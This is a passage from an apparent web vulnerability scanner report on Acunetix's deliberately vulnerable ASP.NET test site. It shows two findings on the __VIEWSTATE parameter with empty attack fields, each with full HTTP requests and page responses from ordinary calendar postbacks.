13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1119 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,119 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8485&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgAA7QqNLdsIZGRkS7BAitjHMqkbc%2B8%2FliEEBzMKsNg%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKiy%2B0iAtOn6sAIArXOmMILAr%2BTx4wEAr%2BTx4wEAr%2BT%2B6MNAr%2BT%2B6MNAr%2BT78YGAr%2BT78YGAr%2BTw68DAr%2BTw68DAr%2BT98IMAr%2BT98IMApC6wesPApC6wesPApC69Y4HApC69Y4HApC66SUCkLrpJQKQup34CQKQup34CQKQurGfAQKQurGfAQKQuqWyCgKQuqWyCgKQutnWAwKQutnWAwKQus3tDAKQus3tDAKQuqHVCQKQuqHVCQKQutXpAgKQutXpAgLX2ZSeBwLX2ZSeBwLX2Yg1AtfZiDUC19m8yAkC19m8yAkC19nQ7AIC19nQ7AIC19nEgwoC19nEgwoC19n4pgMC19n4pgMC19ns%2FQwC19ns%2FQwC19mAkAQC19mAkAQC19n0%2BQIC19n0%2BQIC19nonAoC19nonAoCqOD6hQ0CqOD6hQ0CqODu2AYCqODu2AYCqOCC%2Fw8CqOCC%2Fw8CqOC2kgcCqOC2kgcCqOCqKQKo4KopAqjg3s0JAqjg3s0JAqjg8uACAqjg8uACAqjg5ocKAqjg5ocKAqjg2uwIAqjg2uwIAqjgzgMCqODOAwKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXB0EBmJ5MumAMg2%2F10TsLczK%2FVnM8
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:50:23 GMT Content-Length: 12477
Response Body - size: 12,477 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgAA7QqNLdsIZGRkS7BAitjHMqkbc+8/liEEBzMKsNg=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKiy+0iAtOn6sAIArXOmMILAr+Tx4wEAr+Tx4wEAr+T+6MNAr+T+6MNAr+T78YGAr+T78YGAr+Tw68DAr+Tw68DAr+T98IMAr+T98IMApC6wesPApC6wesPApC69Y4HApC69Y4HApC66SUCkLrpJQKQup34CQKQup34CQKQurGfAQKQurGfAQKQuqWyCgKQuqWyCgKQutnWAwKQutnWAwKQus3tDAKQus3tDAKQuqHVCQKQuqHVCQKQutXpAgKQutXpAgLX2ZSeBwLX2ZSeBwLX2Yg1AtfZiDUC19m8yAkC19m8yAkC19nQ7AIC19nQ7AIC19nEgwoC19nEgwoC19n4pgMC19n4pgMC19ns/QwC19ns/QwC19mAkAQC19mAkAQC19n0+QIC19n0+QIC19nonAoC19nonAoCqOD6hQ0CqOD6hQ0CqODu2AYCqODu2AYCqOCC/w8CqOCC/w8CqOC2kgcCqOC2kgcCqOCqKQKo4KopAqjg3s0JAqjg3s0JAqjg8uACAqjg8uACAqjg5ocKAqjg5ocKAqjg2uwIAqjg2uwIAqjgzgMCqODOAwKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXB0EBmJ5MumAMg2/10TsLczK/VnM8" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:White" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1113 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,113 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8501&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgAAibEfOtsIZGRkVRZcb7PWoL3lo2hxlMU%2B0F2mM8U%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK5zIJkAtOn6sAIArXOmMILAr%2BTx4wEAr%2BTx4wEAr%2BT%2B6MNAr%2BT%2B6MNAr%2BT78YGAr%2BT78YGAr%2BTw68DAr%2BTw68DAr%2BT98IMAr%2BT98IMApC6wesPApC6wesPApC69Y4HApC69Y4HApC66SUCkLrpJQKQup34CQKQup34CQKQurGfAQKQurGfAQKQuqWyCgKQuqWyCgKQutnWAwKQutnWAwKQus3tDAKQus3tDAKQuqHVCQKQuqHVCQKQutXpAgKQutXpAgLX2ZSeBwLX2ZSeBwLX2Yg1AtfZiDUC19m8yAkC19m8yAkC19nQ7AIC19nQ7AIC19nEgwoC19nEgwoC19n4pgMC19n4pgMC19ns%2FQwC19ns%2FQwC19mAkAQC19mAkAQC19n0%2BQIC19n0%2BQIC19nonAoC19nonAoCqOD6hQ0CqOD6hQ0CqODu2AYCqODu2AYCqOCC%2Fw8CqOCC%2Fw8CqOC2kgcCqOC2kgcCqOCqKQKo4KopAqjg3s0JAqjg3s0JAqjg8uACAqjg8uACAqjg5ocKAqjg5ocKAqjg2uwIAqjg2uwIAqjgzgMCqODOAwKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXB3z3OVps1G%2F0jpAXdhyCTnjlCgeC
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:33:55 GMT Content-Length: 12477
Response Body - size: 12,477 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgAAibEfOtsIZGRkVRZcb7PWoL3lo2hxlMU+0F2mM8U=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK5zIJkAtOn6sAIArXOmMILAr+Tx4wEAr+Tx4wEAr+T+6MNAr+T+6MNAr+T78YGAr+T78YGAr+Tw68DAr+Tw68DAr+T98IMAr+T98IMApC6wesPApC6wesPApC69Y4HApC69Y4HApC66SUCkLrpJQKQup34CQKQup34CQKQurGfAQKQurGfAQKQuqWyCgKQuqWyCgKQutnWAwKQutnWAwKQus3tDAKQus3tDAKQuqHVCQKQuqHVCQKQutXpAgKQutXpAgLX2ZSeBwLX2ZSeBwLX2Yg1AtfZiDUC19m8yAkC19m8yAkC19nQ7AIC19nQ7AIC19nEgwoC19nEgwoC19n4pgMC19n4pgMC19ns/QwC19ns/QwC19mAkAQC19mAkAQC19n0+QIC19n0+QIC19nonAoC19nonAoCqOD6hQ0CqOD6hQ0CqODu2AYCqODu2AYCqOCC/w8CqOCC/w8CqOC2kgcCqOC2kgcCqOCqKQKo4KopAqjg3s0JAqjg3s0JAqjg8uACAqjg8uACAqjg5ocKAqjg5ocKAqjg2uwIAqjg2uwIAqjgzgMCqODOAwKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXB3z3OVps1G/0jpAXdhyCTnjlCgeC" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:White" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" 